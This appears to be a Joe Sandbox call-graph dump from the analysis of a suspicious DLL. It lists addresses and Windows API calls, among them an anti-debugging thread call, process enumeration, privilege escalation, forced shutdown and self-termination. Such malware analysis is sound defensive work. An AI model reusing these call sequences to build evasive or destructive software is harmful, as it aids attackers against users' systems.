100470->100471 100472 6caf6e0f 100471->100472 100472->100410 100474 6cc5638d 100473->100474 100876 6cc565a0 100474->100876 100476 6cc5647c 100476->100410 100480 6cc563a5 100480->100476 100894 6cb22250 30 API calls 100480->100894 100895 6cb226e0 24 API calls 4 library calls 100480->100895 100896 6cc59379 RaiseException 
100480->100896 100482 6cb3203f 100481->100482 100483 6cb32053 100482->100483 100905 6cb23560 32 API calls std::_Xinvalid_argument 100482->100905 100486 6cb3210e 100483->100486 100907 6cb22250 30 API calls 100483->100907 100908 6cb226e0 24 API calls 4 library calls 100483->100908 100909 6cc59379 RaiseException 100483->100909 100489 6cb32121 100486->100489 100906 6cb237e0 32 API calls std::_Xinvalid_argument 100486->100906 100489->100410 100492 6cc55b9e 100491->100492 100494 6cc55bd1 100491->100494 100910 6cb201f0 100492->100910 100493 6cc55c83 100493->100416 100494->100493 100914 6cb22250 30 API calls 100494->100914 100498 6cc60b18 67 API calls 100498->100494 100499 6cc55cae 100915 6cb22340 24 API calls 100499->100915 100501 6cc55cbe 100916 6cc59379 RaiseException 100501->100916 100503 6cc55cc9 100504 6cb1e010 67 API calls 100503->100504 100505 6cc55d22 std::ios_base::_Ios_base_dtor 100504->100505 100505->100416 100508 6cb1e04b 100506->100508 100507 6cb1e0a3 100507->100408 100508->100507 100509 6cb201f0 64 API calls 100508->100509 100510 6cb1e098 100509->100510 100511 6cc60b18 67 API calls 100510->100511 100511->100507 100513 6caf709e 100512->100513 100514 6caf70d1 100512->100514 100516 6cb201f0 64 API calls 100513->100516 100515 6caf7183 100514->100515 100962 6cb22250 30 API calls 100514->100962 100515->100418 100517 6caf70c4 100516->100517 100519 6cc60b18 67 API calls 100517->100519 100519->100514 100520 6caf71ae 100963 6cb22340 24 API calls 100520->100963 100522 6caf71be 100964 6cc59379 RaiseException 100522->100964 100524 6caf71c9 100526 6cc56a43 std::_Facet_Register 4 API calls 100525->100526 100527 6cb2207e 100526->100527 100528 6cc57327 43 API calls 100527->100528 100529 6cb22092 100528->100529 100564 6cb22f60 42 API calls 4 library calls 100529->100564 100531 6cb220c8 100532 6cb2210d 100531->100532 100534 6cb22136 100531->100534 100533 6cb22120 100532->100533 100565 6cc56f8e 9 API calls 2 library calls 100532->100565 100533->100438 100566 6cb22250 30 API 
calls 100534->100566 100537 6cb2215b 100567 6cb22340 24 API calls 100537->100567 100539 6cb22171 100568 6cc59379 RaiseException 100539->100568 100541 6cb2217c 100541->100438 100543 6cc57333 __EH_prolog3 100542->100543 100569 6cc56eb5 100543->100569 100547 6cc57351 100583 6cc573ba 39 API calls std::locale::_Setgloballocale 100547->100583 100550 6cc573ac 100550->100442 100551 6cc57359 100584 6cc571b1 HeapFree GetLastError _Yarn 100551->100584 100553 6cc5736f 100575 6cc56ee6 100553->100575 100555 6cb21dc7 100554->100555 100556 6cb21ddc 100554->100556 100555->100445 100561 6cb22250 30 API calls 100555->100561 100589 6cc57447 100556->100589 100560 6cb21e82 100561->100447 100562->100449 100563->100451 100564->100531 100565->100533 100566->100537 100567->100539 100568->100541 100570 6cc56ec4 100569->100570 100571 6cc56ecb 100569->100571 100585 6cc603cd 6 API calls std::_Lockit::_Lockit 100570->100585 100573 6cc56ec9 100571->100573 100586 6cc5858b EnterCriticalSection 100571->100586 100573->100553 100582 6cc57230 6 API calls 2 library calls 100573->100582 100576 6cc56ef0 100575->100576 100577 6cc603db 100575->100577 100578 6cc56f03 100576->100578 100587 6cc58599 LeaveCriticalSection 100576->100587 100588 6cc603b6 LeaveCriticalSection 100577->100588 100578->100550 100581 6cc603e2 100581->100550 100582->100547 100583->100551 100584->100553 100585->100573 100586->100573 100587->100578 100588->100581 100590 6cc57450 100589->100590 100593 6cb21dea 100590->100593 100598 6cc5fd4a 100590->100598 100592 6cc5749c 100592->100593 100609 6cc5fa58 65 API calls 100592->100609 100593->100555 100597 6cc5c563 18 API calls __fassign 100593->100597 100595 6cc574b7 100595->100593 100610 6cc60b18 100595->100610 100597->100560 100599 6cc5fd55 __wsopen_s 100598->100599 100600 6cc5fd68 100599->100600 100601 6cc5fd88 100599->100601 100635 6cc60120 18 API calls __fassign 100600->100635 100605 6cc5fd78 100601->100605 100621 6cc6ae0c 100601->100621 100605->100592 100609->100595 100611 6cc60b24 
__wsopen_s 100610->100611 100612 6cc60b43 100611->100612 100613 6cc60b2e 100611->100613 100617 6cc60b3e 100612->100617 100744 6cc5c5a9 EnterCriticalSection 100612->100744 100759 6cc60120 18 API calls __fassign 100613->100759 100615 6cc60b60 100745 6cc60b9c 100615->100745 100617->100593 100619 6cc60b6b 100760 6cc60b92 LeaveCriticalSection 100619->100760 100622 6cc6ae18 __wsopen_s 100621->100622 100637 6cc6039f EnterCriticalSection 100622->100637 100624 6cc6ae26 100638 6cc6aeb0 100624->100638 100629 6cc6af72 100630 6cc6b091 100629->100630 100662 6cc6b114 100630->100662 100633 6cc5fdcc 100636 6cc5fdf5 LeaveCriticalSection 100633->100636 100635->100605 100636->100605 100637->100624 100646 6cc6aed3 100638->100646 100639 6cc6ae33 100652 6cc6ae6c 100639->100652 100640 6cc6af2b 100657 6cc671e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100640->100657 100643 6cc6af34 100658 6cc647bb HeapFree GetLastError __dosmaperr 100643->100658 100645 6cc6af3d 100645->100639 100659 6cc66c1f 6 API calls std::_Lockit::_Lockit 100645->100659 100646->100639 100646->100640 100646->100646 100655 6cc5c5a9 EnterCriticalSection 100646->100655 100656 6cc5c5bd LeaveCriticalSection 100646->100656 100648 6cc6af5c 100660 6cc5c5a9 EnterCriticalSection 100648->100660 100651 6cc6af6f 100651->100639 100661 6cc603b6 LeaveCriticalSection 100652->100661 100654 6cc5fda3 100654->100605 100654->100629 100655->100646 100656->100646 100657->100643 100658->100645 100659->100648 100660->100651 100661->100654 100663 6cc6b133 100662->100663 100664 6cc6b146 100663->100664 100666 6cc6b15b 100663->100666 100678 6cc60120 18 API calls __fassign 100664->100678 100668 6cc6b27b 100666->100668 100679 6cc73ea8 37 API calls __fassign 100666->100679 100667 6cc6b0a7 100667->100633 100675 6cc73fde 100667->100675 100668->100667 100682 6cc60120 18 API calls __fassign 100668->100682 100671 6cc6b2cb 100671->100668 100680 6cc73ea8 37 API calls __fassign 100671->100680 100673 6cc6b2e9 
100673->100668 100681 6cc73ea8 37 API calls __fassign 100673->100681 100683 6cc74396 100675->100683 100678->100667 100679->100671 100680->100673 100681->100668 100682->100667 100684 6cc743a2 __wsopen_s 100683->100684 100685 6cc743a9 100684->100685 100686 6cc743d4 100684->100686 100701 6cc60120 18 API calls __fassign 100685->100701 100692 6cc73ffe 100686->100692 100691 6cc73ff9 100691->100633 100703 6cc606cb 100692->100703 100698 6cc74034 100700 6cc74066 100698->100700 100743 6cc647bb HeapFree GetLastError __dosmaperr 100698->100743 100702 6cc7442b LeaveCriticalSection __wsopen_s 100700->100702 100701->100691 100702->100691 100704 6cc5bceb __fassign 37 API calls 100703->100704 100705 6cc606dd 100704->100705 100706 6cc606ef 100705->100706 100707 6cc669d5 __wsopen_s 5 API calls 100705->100707 100708 6cc5bdf6 100706->100708 100707->100706 100709 6cc5be4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100708->100709 100710 6cc5be0e 100709->100710 100710->100698 100711 6cc7406c 100710->100711 100712 6cc744ec __wsopen_s 18 API calls 100711->100712 100713 6cc74089 100712->100713 100714 6cc7160c __wsopen_s 14 API calls 100713->100714 100718 6cc7409e __dosmaperr 100713->100718 100715 6cc740bc 100714->100715 100716 6cc74457 __wsopen_s CreateFileW 100715->100716 100715->100718 100722 6cc74115 100716->100722 100717 6cc74192 GetFileType 100720 6cc741e4 100717->100720 100721 6cc7419d GetLastError 100717->100721 100718->100698 100719 6cc74167 GetLastError 100719->100718 100726 6cc717b0 __wsopen_s SetStdHandle 100720->100726 100723 6cc5f9f2 __dosmaperr 100721->100723 100722->100717 100722->100719 100724 6cc74457 __wsopen_s CreateFileW 100722->100724 100725 6cc741ab CloseHandle 100723->100725 100727 6cc7415a 100724->100727 100725->100718 100739 6cc741d4 100725->100739 100728 6cc74205 100726->100728 100727->100717 100727->100719 100729 6cc74251 100728->100729 100731 6cc74666 __wsopen_s 70 API calls 100728->100731 100730 6cc74710 __wsopen_s 70 API calls 
100729->100730 100734 6cc74258 100729->100734 100732 6cc74286 100730->100732 100731->100729 100733 6cc74294 100732->100733 100732->100734 100733->100718 100736 6cc74310 CloseHandle 100733->100736 100735 6cc6b925 __wsopen_s 21 API calls 100734->100735 100735->100718 100737 6cc74457 __wsopen_s CreateFileW 100736->100737 100738 6cc7433b 100737->100738 100738->100739 100740 6cc74345 GetLastError 100738->100740 100739->100718 100741 6cc74351 __dosmaperr 100740->100741 100742 6cc7171f __wsopen_s SetStdHandle 100741->100742 100742->100739 100743->100700 100744->100615 100746 6cc60bbe 100745->100746 100747 6cc60ba9 100745->100747 100751 6cc60bb9 100746->100751 100761 6cc60cb9 100746->100761 100783 6cc60120 18 API calls __fassign 100747->100783 100751->100619 100755 6cc60be1 100776 6cc6b898 100755->100776 100757 6cc60be7 100757->100751 100784 6cc647bb HeapFree GetLastError __dosmaperr 100757->100784 100759->100617 100760->100617 100762 6cc60cd1 100761->100762 100763 6cc60bd3 100761->100763 100762->100763 100764 6cc69c60 18 API calls 100762->100764 100767 6cc6873e 100763->100767 100765 6cc60cef 100764->100765 100785 6cc6bb6c 100765->100785 100768 6cc68755 100767->100768 100769 6cc60bdb 100767->100769 100768->100769 100841 6cc647bb HeapFree GetLastError __dosmaperr 100768->100841 100771 6cc69c60 100769->100771 100772 6cc69c81 100771->100772 100773 6cc69c6c 100771->100773 100772->100755 100842 6cc60120 18 API calls __fassign 100773->100842 100775 6cc69c7c 100775->100755 100777 6cc6b8be 100776->100777 100781 6cc6b8a9 __dosmaperr 100776->100781 100778 6cc6b8e5 100777->100778 100780 6cc6b907 __dosmaperr 100777->100780 100843 6cc6b9c1 100778->100843 100851 6cc60120 18 API calls __fassign 100780->100851 100781->100757 100783->100751 100784->100751 100786 6cc6bb78 __wsopen_s 100785->100786 100787 6cc6bbca 100786->100787 100788 6cc6bc33 __dosmaperr 100786->100788 100792 6cc6bb80 __dosmaperr 100786->100792 100796 6cc71990 EnterCriticalSection 100787->100796 100826 6cc60120 18 API 
calls __fassign 100788->100826 100790 6cc6bbd0 100794 6cc6bbec __dosmaperr 100790->100794 100797 6cc6bc5e 100790->100797 100792->100763 100825 6cc6bc2b LeaveCriticalSection __wsopen_s 100794->100825 100796->100790 100798 6cc6bc80 100797->100798 100824 6cc6bc9c __dosmaperr 100797->100824 100799 6cc6bcd4 100798->100799 100800 6cc6bc84 __dosmaperr 100798->100800 100801 6cc6bce7 100799->100801 100835 6cc6ac69 20 API calls __wsopen_s 100799->100835 100834 6cc60120 18 API calls __fassign 100800->100834 100827 6cc6be40 100801->100827 100806 6cc6bd3c 100810 6cc6bd95 WriteFile 100806->100810 100811 6cc6bd50 100806->100811 100807 6cc6bcfd 100808 6cc6bd26 100807->100808 100809 6cc6bd01 100807->100809 100837 6cc6beb1 43 API calls 5 library calls 100808->100837 100809->100824 100836 6cc6c25b 6 API calls __wsopen_s 100809->100836 100813 6cc6bdb9 GetLastError 100810->100813 100810->100824 100814 6cc6bd85 100811->100814 100815 6cc6bd5b 100811->100815 100813->100824 100840 6cc6c2c3 7 API calls 2 library calls 100814->100840 100818 6cc6bd75 100815->100818 100819 6cc6bd60 100815->100819 100839 6cc6c487 8 API calls 3 library calls 100818->100839 100822 6cc6bd65 100819->100822 100819->100824 100821 6cc6bd73 100821->100824 100838 6cc6c39e 7 API calls 2 library calls 100822->100838 100824->100794 100825->100792 100826->100792 100828 6cc719e5 __wsopen_s 18 API calls 100827->100828 100829 6cc6be51 100828->100829 100830 6cc6bcf8 100829->100830 100831 6cc649b2 __Getctype 37 API calls 100829->100831 100830->100806 100830->100807 100832 6cc6be74 100831->100832 100832->100830 100833 6cc6be8e GetConsoleMode 100832->100833 100833->100830 100834->100824 100835->100801 100836->100824 100837->100824 100838->100821 100839->100821 100840->100821 100841->100769 100842->100775 100844 6cc6b9cd __wsopen_s 100843->100844 100852 6cc71990 EnterCriticalSection 100844->100852 100846 6cc6b9db 100848 6cc6ba08 100846->100848 100853 6cc6b925 100846->100853 100866 6cc6ba41 LeaveCriticalSection __wsopen_s 
100848->100866 100850 6cc6ba2a 100850->100781 100851->100781 100852->100846 100867 6cc715a2 100853->100867 100855 6cc6b93b 100872 6cc7171f SetStdHandle __dosmaperr __wsopen_s 100855->100872 100856 6cc6b935 100856->100855 100858 6cc715a2 __wsopen_s 18 API calls 100856->100858 100865 6cc6b96d 100856->100865 100860 6cc6b964 100858->100860 100859 6cc715a2 __wsopen_s 18 API calls 100861 6cc6b979 CloseHandle 100859->100861 100863 6cc715a2 __wsopen_s 18 API calls 100860->100863 100861->100855 100864 6cc6b985 GetLastError 100861->100864 100862 6cc6b993 __dosmaperr 100862->100848 100863->100865 100864->100855 100865->100855 100865->100859 100866->100850 100868 6cc715c4 __dosmaperr 100867->100868 100870 6cc715af __dosmaperr 100867->100870 100869 6cc715e9 100868->100869 100871 6cc60120 __fassign 18 API calls 100868->100871 100869->100856 100870->100856 100871->100870 100872->100862 100873->100466 100874->100468 100875->100470 100877 6cc565dc 100876->100877 100878 6cc56608 100876->100878 100879 6cc56601 100877->100879 100899 6cb22250 30 API calls 100877->100899 100884 6cc56619 100878->100884 100897 6cb23560 32 API calls std::_Xinvalid_argument 100878->100897 100879->100480 100882 6cc567e8 100900 6cb22340 24 API calls 100882->100900 100884->100879 100898 6cb22f60 42 API calls 4 library calls 100884->100898 100885 6cc567f7 100901 6cc59379 RaiseException 100885->100901 100889 6cc56827 100903 6cb22340 24 API calls 100889->100903 100891 6cc5683d 100904 6cc59379 RaiseException 100891->100904 100893 6cc56653 100893->100879 100902 6cb22250 30 API calls 100893->100902 100894->100480 100895->100480 100896->100480 100897->100884 100898->100893 100899->100882 100900->100885 100901->100893 100902->100889 100903->100891 100904->100879 100905->100483 100906->100489 100907->100483 100908->100483 100909->100483 100911 6cb2022e 100910->100911 100912 6cb204d6 100911->100912 100917 6cc617db 100911->100917 100912->100498 100914->100499 100915->100501 100916->100503 100918 6cc61806 100917->100918 
100919 6cc617e9 100917->100919 100918->100911 100919->100918 100920 6cc6180a 100919->100920 100923 6cc617f6 100919->100923 100925 6cc61a02 100920->100925 100933 6cc60120 18 API calls __fassign 100923->100933 100926 6cc61a0e __wsopen_s 100925->100926 100934 6cc5c5a9 EnterCriticalSection 100926->100934 100928 6cc61a1c 100935 6cc619bf 100928->100935 100932 6cc6183c 100932->100911 100933->100918 100934->100928 100943 6cc685a6 100935->100943 100941 6cc619f9 100942 6cc61a51 LeaveCriticalSection 100941->100942 100942->100932 100944 6cc69c60 18 API calls 100943->100944 100945 6cc685b7 100944->100945 100946 6cc719e5 __wsopen_s 18 API calls 100945->100946 100948 6cc685bd __wsopen_s 100946->100948 100947 6cc619d3 100950 6cc6183e 100947->100950 100948->100947 100960 6cc647bb HeapFree GetLastError __dosmaperr 100948->100960 100952 6cc61850 100950->100952 100954 6cc6186e 100950->100954 100951 6cc6185e 100961 6cc60120 18 API calls __fassign 100951->100961 100952->100951 100952->100954 100955 6cc61886 _Yarn 100952->100955 100959 6cc68659 62 API calls 100954->100959 100955->100954 100956 6cc60cb9 62 API calls 100955->100956 100957 6cc69c60 18 API calls 100955->100957 100958 6cc6bb6c __wsopen_s 62 API calls 100955->100958 100956->100955 100957->100955 100958->100955 100959->100941 100960->100947 100961->100954 100962->100520 100963->100522 100964->100524 100965->100421 100966->100428 100967->100430 100968->100423 100969->100426 100970 6cc5ef3f 100971 6cc5ef4b __wsopen_s 100970->100971 100972 6cc5ef52 GetLastError ExitThread 100971->100972 100973 6cc5ef5f 100971->100973 100982 6cc649b2 GetLastError 100973->100982 100978 6cc5ef7b 101015 6cc5eeaa 16 API calls 2 library calls 100978->101015 100981 6cc5ef9d 100983 6cc649cf 100982->100983 100984 6cc649c9 100982->100984 100989 6cc649d5 SetLastError 100983->100989 101017 6cc66b62 6 API calls std::_Lockit::_Lockit 100983->101017 101016 6cc66b23 6 API calls std::_Lockit::_Lockit 100984->101016 100987 6cc649ed 100988 6cc649f1 100987->100988 
100987->100989 101018 6cc671e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100988->101018 100995 6cc5ef64 100989->100995 100996 6cc64a69 100989->100996 100991 6cc649fd 100993 6cc64a05 100991->100993 100994 6cc64a1c 100991->100994 101019 6cc66b62 6 API calls std::_Lockit::_Lockit 100993->101019 101021 6cc66b62 6 API calls std::_Lockit::_Lockit 100994->101021 101009 6cc69d66 100995->101009 101024 6cc60ac9 37 API calls std::locale::_Setgloballocale 100996->101024 101000 6cc64a13 101020 6cc647bb HeapFree GetLastError __dosmaperr 101000->101020 101002 6cc64a28 101003 6cc64a2c 101002->101003 101004 6cc64a3d 101002->101004 101022 6cc66b62 6 API calls std::_Lockit::_Lockit 101003->101022 101023 6cc647bb HeapFree GetLastError __dosmaperr 101004->101023 101007 6cc64a19 101007->100989 101010 6cc69d78 GetPEB 101009->101010 101013 6cc5ef6f 101009->101013 101011 6cc69d8b 101010->101011 101010->101013 101025 6cc66e18 5 API calls std::_Lockit::_Lockit 101011->101025 101013->100978 101014 6cc66d6f 5 API calls std::_Lockit::_Lockit 101013->101014 101014->100978 101015->100981 101016->100983 101017->100987 101018->100991 101019->101000 101020->101007 101021->101002 101022->101000 101023->101007 101025->101013 101026 6cae3b72 101027 6cc56a43 std::_Facet_Register 4 API calls 101026->101027 101033 6cae37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101027->101033 101028 6cc4aec0 2 API calls 101028->101033 101031 6caf6ba0 104 API calls 101031->101033 101033->101028 101033->101031 101034 6caf7090 77 API calls 101033->101034 101035 6cb1e010 67 API calls 101033->101035 101036 6caf639e 101033->101036 101039 6caf6e60 101033->101039 101034->101033 101035->101033 101049 6cc60130 18 API calls 2 library calls 101036->101049 101040 6caf6e9f 101039->101040 101043 6caf6eb3 101040->101043 101050 6cb23560 32 API calls std::_Xinvalid_argument 101040->101050 101046 6caf6f5b 101043->101046 101052 6cb22250 30 API calls 101043->101052 101053 6cb226e0 24 API calls 4 
library calls 101043->101053 101054 6cc59379 RaiseException 101043->101054 101045 6caf6f6e 101045->101033 101046->101045 101051 6cb237e0 32 API calls std::_Xinvalid_argument 101046->101051 101050->101043 101051->101045 101052->101043 101053->101043 101054->101043 101055 6caef8a3 101056 6caef887 101055->101056 101057 6caf02ac GetCurrentProcess TerminateProcess 101056->101057 101058 6caf02ca 101057->101058 101059 6cad4b53 101060 6cc56a43 std::_Facet_Register 4 API calls 101059->101060 101061 6cad4b5c _Yarn 101060->101061 101062 6cc4aec0 2 API calls 101061->101062 101067 6cad4bae std::ios_base::_Ios_base_dtor 101062->101067 101063 6caf639e 101240 6cc60130 18 API calls 2 library calls 101063->101240 101065 6cad5164 CreateFileA CloseHandle 101071 6cad51ec 101065->101071 101066 6cad4cff 101067->101063 101067->101065 101067->101066 101068 6cae245a _Yarn _strlen 101067->101068 101068->101063 101070 6cc4aec0 2 API calls 101068->101070 101085 6cae2a83 std::ios_base::_Ios_base_dtor 101070->101085 101217 6cc55120 OpenSCManagerA 101071->101217 101073 6cadfc00 101233 6cc55240 CreateToolhelp32Snapshot 101073->101233 101076 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101112 6cad5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 101076->101112 101078 6cae37d0 Sleep 101123 6cae37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101078->101123 101079 6cc4aec0 2 API calls 101079->101112 101080 6caf63b2 101241 6cad15e0 18 API calls std::ios_base::_Ios_base_dtor 101080->101241 101081 6cc55240 4 API calls 101099 6cae053a 101081->101099 101083 6cc55240 4 API calls 101106 6cae12e2 101083->101106 101084 6caf64f8 101085->101063 101221 6cc40390 101085->101221 101086 6cadffe3 101086->101081 101091 6cae0abc 101086->101091 101087 6caf6ba0 104 API calls 101087->101112 101088 6caf6e60 32 API calls 101088->101112 101090 6cc55240 4 API calls 101090->101091 101091->101068 101091->101083 101092 6caf7090 77 API calls 101092->101112 101093 
6cae211c 101093->101068 101095 6cae241a 101093->101095 101094 6cc55240 4 API calls 101114 6cae1dd9 101094->101114 101098 6cc40390 11 API calls 101095->101098 101096 6cc4aec0 2 API calls 101096->101123 101097 6cb1e010 67 API calls 101097->101112 101101 6cae244d 101098->101101 101099->101090 101099->101091 101100 6cad6722 101230 6cc51880 25 API calls 4 library calls 101100->101230 101239 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101101->101239 101103 6cae2452 Sleep 101103->101068 101104 6cad6162 101105 6cae16ac 101106->101093 101106->101094 101106->101105 101107 6cad740b 101108 6cc54ff0 4 API calls 101107->101108 101116 6cad775a _strlen 101108->101116 101109 6cc55240 4 API calls 101109->101093 101110 6caf6ba0 104 API calls 101110->101123 101111 6caf6e60 32 API calls 101111->101123 101112->101063 101112->101073 101112->101076 101112->101079 101112->101087 101112->101088 101112->101092 101112->101097 101112->101100 101112->101104 101113 6caf7090 77 API calls 101113->101123 101114->101093 101114->101109 101115 6cb1e010 67 API calls 101115->101123 101116->101063 101117 6cad7ba9 101116->101117 101118 6cad7b92 101116->101118 101121 6cad7b43 _Yarn 101116->101121 101120 6cc56a43 std::_Facet_Register 4 API calls 101117->101120 101119 6cc56a43 std::_Facet_Register 4 API calls 101118->101119 101119->101121 101120->101121 101122 6cc4aec0 2 API calls 101121->101122 101132 6cad7be7 std::ios_base::_Ios_base_dtor 101122->101132 101123->101063 101123->101096 101123->101110 101123->101111 101123->101113 101123->101115 101124 6cc54ff0 4 API calls 101135 6cad8a07 101124->101135 101125 6cad9d7f 101129 6cc56a43 std::_Facet_Register 4 API calls 101125->101129 101126 6cad9d68 101128 6cc56a43 std::_Facet_Register 4 API calls 101126->101128 101127 6cad962c _strlen 101127->101063 101127->101125 101127->101126 101130 6cad9d18 _Yarn 101127->101130 101128->101130 101129->101130 101131 6cc4aec0 2 API calls 101130->101131 101139 
6cad9dbd std::ios_base::_Ios_base_dtor 101131->101139 101132->101063 101132->101124 101132->101127 101133 6cad8387 101132->101133 101134 6cc54ff0 4 API calls 101143 6cad9120 101134->101143 101135->101134 101136 6cc54ff0 4 API calls 101153 6cada215 _strlen 101136->101153 101137 6cc54ff0 4 API calls 101138 6cad9624 101137->101138 101231 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101138->101231 101139->101063 101139->101136 101144 6cade8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101139->101144 101140 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101140->101144 101142 6cc4aec0 2 API calls 101142->101144 101143->101137 101144->101063 101144->101140 101144->101142 101145 6cadf7b1 101144->101145 101146 6caded02 Sleep 101144->101146 101232 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101145->101232 101165 6cade8c1 101146->101165 101148 6cade8dd GetCurrentProcess TerminateProcess 101148->101144 101149 6cada9bb 101152 6cc56a43 std::_Facet_Register 4 API calls 101149->101152 101150 6cada9a4 101151 6cc56a43 std::_Facet_Register 4 API calls 101150->101151 101158 6cada953 _Yarn _strlen 101151->101158 101152->101158 101153->101063 101153->101149 101153->101150 101153->101158 101154 6cc54ff0 4 API calls 101154->101165 101155 6cadfbb8 101156 6cadfbe8 ExitWindowsEx Sleep 101155->101156 101156->101073 101157 6cadf7c0 101157->101155 101158->101080 101159 6cadb009 101158->101159 101160 6cadaff0 101158->101160 101163 6cadafa0 _Yarn 101158->101163 101161 6cc56a43 std::_Facet_Register 4 API calls 101159->101161 101162 6cc56a43 std::_Facet_Register 4 API calls 101160->101162 101161->101163 101162->101163 101164 6cc55960 104 API calls 101163->101164 101166 6cadb059 std::ios_base::_Ios_base_dtor _strlen 101164->101166 101165->101144 101165->101148 101165->101154 101166->101063 101167 6cadb42c 
101166->101167 101168 6cadb443 101166->101168 101171 6cadb3da _Yarn _strlen 101166->101171 101169 6cc56a43 std::_Facet_Register 4 API calls 101167->101169 101170 6cc56a43 std::_Facet_Register 4 API calls 101168->101170 101169->101171 101170->101171 101171->101080 101172 6cadb79e 101171->101172 101173 6cadb7b7 101171->101173 101176 6cadb751 _Yarn 101171->101176 101174 6cc56a43 std::_Facet_Register 4 API calls 101172->101174 101175 6cc56a43 std::_Facet_Register 4 API calls 101173->101175 101174->101176 101175->101176 101177 6cc55960 104 API calls 101176->101177 101178 6cadb804 std::ios_base::_Ios_base_dtor _strlen 101177->101178 101178->101063 101179 6cadbc0f 101178->101179 101180 6cadbc26 101178->101180 101183 6cadbbbd _Yarn _strlen 101178->101183 101181 6cc56a43 std::_Facet_Register 4 API calls 101179->101181 101182 6cc56a43 std::_Facet_Register 4 API calls 101180->101182 101181->101183 101182->101183 101183->101080 101184 6cadc08e 101183->101184 101185 6cadc075 101183->101185 101188 6cadc028 _Yarn 101183->101188 101187 6cc56a43 std::_Facet_Register 4 API calls 101184->101187 101186 6cc56a43 std::_Facet_Register 4 API calls 101185->101186 101186->101188 101187->101188 101189 6cc55960 104 API calls 101188->101189 101194 6cadc0db std::ios_base::_Ios_base_dtor _strlen 101189->101194 101190 6cadc7bc 101193 6cc56a43 std::_Facet_Register 4 API calls 101190->101193 101191 6cadc7a5 101192 6cc56a43 std::_Facet_Register 4 API calls 101191->101192 101201 6cadc753 _Yarn _strlen 101192->101201 101193->101201 101194->101063 101194->101190 101194->101191 101194->101201 101195 6cadd3ed 101197 6cc56a43 std::_Facet_Register 4 API calls 101195->101197 101196 6cadd406 101198 6cc56a43 std::_Facet_Register 4 API calls 101196->101198 101199 6cadd39a _Yarn 101197->101199 101198->101199 101200 6cc55960 104 API calls 101199->101200 101202 6cadd458 std::ios_base::_Ios_base_dtor _strlen 101200->101202 101201->101080 101201->101195 101201->101196 101201->101199 101207 6cadcb2f 101201->101207 
101202->101063 101203 6cadd8bb 101202->101203 101204 6cadd8a4 101202->101204 101208 6cadd852 _Yarn _strlen 101202->101208 101206 6cc56a43 std::_Facet_Register 4 API calls 101203->101206 101205 6cc56a43 std::_Facet_Register 4 API calls 101204->101205 101205->101208 101206->101208 101208->101080 101209 6caddccf 101208->101209 101210 6caddcb6 101208->101210 101213 6caddc69 _Yarn 101208->101213 101212 6cc56a43 std::_Facet_Register 4 API calls 101209->101212 101211 6cc56a43 std::_Facet_Register 4 API calls 101210->101211 101211->101213 101212->101213 101214 6cc55960 104 API calls 101213->101214 101216 6caddd1c std::ios_base::_Ios_base_dtor 101214->101216 101215 6cc54ff0 4 API calls 101215->101144 101216->101063 101216->101215 101219 6cc55156 101217->101219 101218 6cc551e8 OpenServiceA 101218->101219 101219->101218 101220 6cc5522f 101219->101220 101220->101112 101222 6cc403a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101221->101222 101223 6cc4310e CloseHandle 101222->101223 101224 6cc43f5f CloseHandle 101222->101224 101225 6cc4251b CloseHandle 101222->101225 101226 6cae37cb 101222->101226 101227 6cc2c1e0 WriteFile WriteFile WriteFile ReadFile 101222->101227 101242 6cc2b730 101222->101242 101223->101222 101224->101222 101225->101222 101229 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101226->101229 101227->101222 101229->101078 101230->101107 101231->101127 101232->101157 101235 6cc552a0 std::locale::_Setgloballocale 101233->101235 101234 6cc55277 CloseHandle 101234->101235 101235->101234 101236 6cc55320 Process32NextW 101235->101236 101237 6cc553b1 101235->101237 101238 6cc55345 Process32FirstW 101235->101238 101236->101235 101237->101086 101238->101235 101239->101103 101241->101084 101243 6cc2b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101242->101243 101244 6cc2c180 101243->101244 101245 6cc2bced CreateFileA 101243->101245 101247 6cc2aa30 101243->101247 101244->101222 101245->101243 
101250 6cc2aa43 __wsopen_s std::locale::_Setgloballocale 101247->101250 101248 6cc2b43d WriteFile 101248->101250 101249 6cc2b3e9 WriteFile 101249->101250 101250->101248 101250->101249 101251 6cc2b718 101250->101251 101252 6cc2ab95 ReadFile 101250->101252 101251->101243 101252->101250 101253 6cad3d62 101255 6cad3bc0 101253->101255 101254 6cad3e8a GetCurrentThread NtSetInformationThread 101256 6cad3eea 101254->101256 101255->101254
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
